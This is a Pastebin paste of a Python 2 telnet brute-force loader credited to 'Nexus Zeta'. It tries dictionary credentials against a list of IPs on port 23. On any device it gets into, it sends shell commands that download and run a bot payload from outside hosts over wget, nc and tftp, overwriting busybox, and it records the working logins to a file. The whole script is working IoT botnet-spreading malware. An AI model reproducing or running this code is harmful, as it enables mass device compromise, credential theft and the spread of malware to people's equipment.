Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from termcolor import colored
- from Queue import *
- from sys import stdout
- import threading, sys, time, random, socket, re, os, logging
- if len(sys.argv) < 5:
- print "Example: python %s targets.txt dictionary.txt <threads(1-100)> <ips per scan(100-1000)>" % (str(sys.argv[0]))
- print "Dictionary should be in user:pass format"
- sys.exit(1)
- print "\x1b[1;32m***********************\x1b[1;35m"
- print "\x1b[1;32m* Coded by Nexus Zeta *\x1b[1;35m"
- print "\x1b[1;32m***********************\x1b[1;35m"
- #ip=sys.argv[1]
- filename=sys.argv[2]
- threads = int(sys.argv[3])
- h0h0 = int(sys.argv[4])
- ips = open(sys.argv[1], "r").readlines()
- queue = Queue()
- qcount = 0
- #cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://unicorn.d3dx9.ch/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper
- wget = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://unicorn.d3dx9.ch/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
- echo = "cd /var/; rm -rf busybox filename; rm -rf busybox armv4l.sh; echo -ne 'GET /armv4l.sh HTTP/1.0\r\nHost: 163.172.90.235\r\n\r\n' | nc 163.172.90.235 80 > armv4l.sh; chmod +x *; sed -i 1,9d armv4l.sh; cp /bin/busybox ./; busybox cat armv4l.sh > armv4l.sh; chmod +x armv4l.sh; ./armv4l.sh; rm -rf busybox armv4l.sh;"
- tftp1 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp 163.172.90.235 -c get bins.sh; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
- tftp2 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp -r bins.sh -g 163.172.90.235; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
- #ftpget = "cd /var/; rm -rf armv4l; ftpget -v -u anonymous -p anonymous -P 21 163.172.90.235 armv4l armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
- #curl = "cd /var/; rm -rf armv4l; curl -O http://unicorn.d3dx9.ch/bin/armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
- for ip in ips:
- qcount += 1
- stdout.write("\r[%d] Added to queue" % qcount)
- stdout.flush()
- queue.put(ip)
- print "\n"
- def readUntil(tn, string, timeout=20):
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += tn.recv(1024)
- time.sleep(0.01)
- if string in buf: return buf
- #raise Exception('TIMEOUT!')
- def worker():
- try:
- while True:
- try:
- if queue.empty() == True:
- sys.exit(1)
- iplist = []
- h0h0h0 = h0h0 + 1
- #print "\033[33mGathering IPs\033[37m"%(ip.rstrip("\n"))
- for x in xrange(h0h0h0):
- ip = queue.get()
- iplist.append(ip)
- #print "\033[33mIP Address Obtained \033[32m%s\033[37m"%(ip.rstrip("\n"))
- queue.task_done()
- time.sleep(1.5)
- for ip in iplist:
- t = threading.Thread(target=ipthread, args=(ip.rstrip(),"null"))
- t.start()
- time.sleep(0.009)
- time.sleep(1)
- #print "\033[32mStarting Telnet Threads\033[37m"
- except:
- print "\033[31mWORKER ERROR\033[37m" #will fuk up if more threads/workers then ips in list
- pass
- except:
- pass
- def attempt(IP,UserName,Password):
- try:
- ip=IP
- username=UserName
- password=Password
- tn = socket.socket()
- tn.settimeout(5)
- tn.connect((IP, 23))
- #except Exception:
- #print "[%s] Timeout"%(count)
- #try:
- time.sleep(0.01)
- hoho = ''
- hoho += readUntil(tn, ":")
- if "ogin" in hoho or "sername" in hoho:
- tn.send(UserName + "\n")
- except Exception:
- tn.close()
- try:
- hoho = ''
- hoho += readUntil(tn, ":")
- if "assword" in hoho:
- tn.send(Password + "\n")
- tn.send("wget\n")
- tn.send("tftp\n")
- tn.send("ifconfig\n")
- time.sleep(3)
- except Exception:
- tn.close()
- try:
- mp = ''
- mp += tn.recv(1024)
- if "#" in mp or "$" in mp or "@" in mp or ">" in mp:
- #if "addr" in mp or "Usage" in mp or "wget:" in mp or "tftp:" in mp or "ifconfig:" in mp or "$" in mp or "#" in mp:
- tn.send(wget + "\n")
- tn.send(echo + "\n")
- tn.send(tftp1 + "\n")
- tn.send(tftp2 + "\n")
- #tn.send(ftpget + "\n")
- #tn.send(curl + "\n")
- print '\x1b[1;32mFound \x1b[1;31m '+IP+':23 \x1b[1;35m'+UserName+':\x1b[1;36m'+Password+'\x1b[1;33m'
- f = open('session.txt', 'a')
- f.write("%s:23 %s:%s\n" % (IP, UserName, Password))
- f.close()
- time.sleep(15)
- tn.close()
- except Exception:
- tn.close()
- def ipthread(ip,null):
- fd = open(filename, "r")
- for line in fd.readlines():
- username, password = line.strip().split(":")
- t = threading.Thread(target=attempt, args=(ip,username,password))
- t.start()
- time.sleep(0.3)
- fd.close()
- for g in xrange(threads):
- t = threading.Thread(target=worker)
- t.setDaemon(True)
- t.start()
- time.sleep(0.001)
- queue.join()
- print "Finished!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement